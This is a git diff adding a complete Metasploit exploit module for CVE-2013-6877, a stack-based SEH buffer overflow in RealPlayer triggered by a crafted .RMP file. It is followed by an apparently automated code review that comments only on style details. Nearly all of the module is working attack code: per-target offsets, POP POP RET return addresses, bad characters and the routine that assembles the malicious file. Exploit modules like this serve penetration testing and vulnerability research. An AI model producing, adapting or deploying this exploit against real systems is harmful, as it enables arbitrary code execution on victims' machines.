diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
new file mode 100644
index 0000000000..e9d022bfe9
--- /dev/null
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' =>
+ 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in
+ version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
+ improper bounds checking of the version and encoding attributes inside
+ the XML declaration.
+
+ By persuading the victim to open a specially-crafted .RMP file, a
+ remote attacker could execute arbitrary code on the system or cause
+ the application to crash.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Gabor Seljan' # Vulnerability discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6877' ],
+ [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'seh'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x22",
+ 'Space' => 532,
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
+ {
+ 'Offset' => 2540,
+ 'Ret' => 0x641930c8, # POP POP RET from rpap3260.dll
+ 'Max' => 3095, # overflow occurs at 3080 byte
+ }
+ ],
+ [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
+ {
+ 'Offset' => 2540,
+ 'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll
+ 'Max' => 3095, # overflow occurs at 3080 byte
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Dec 20, 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp']),
+ ],
+ self.class)
+
+ end
+
+ def exploit
+
+ sploit = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
+ sploit << rand_text_alpha_upper(target['Offset'])
+ sploit << generate_seh_payload(target.ret)
+ sploit << make_nops(target['Max']-sploit.length)
+ sploit << "\x22\x3f\x3e\x3b"
+
+ # Create the file
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+ file_create(sploit)
+
+ end
+end
\ No newline at end of file
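Review bot: The header comment on the second line of the new file has a malformed URL, `# This module requires Metasploit: http//metasploit.com/download` is missing the colon after `http` and should read `http://metasploit.com/download`. In `exploit`, the line `sploit << make_nops(target['Max']-sploit.length)` omits the spaces around the subtraction that the rest of the file's operators carry; `sploit << make_nops(target['Max'] - sploit.length)` matches house style. The two identical target comments `# overflow occurs at 3080 byte` would read better as `# overflow occurs at 3080 bytes`, and the `register_options` array carries a trailing comma after its only element that the framework's other option lists do not. The `exploit` method and the whole class are contained in this hunk.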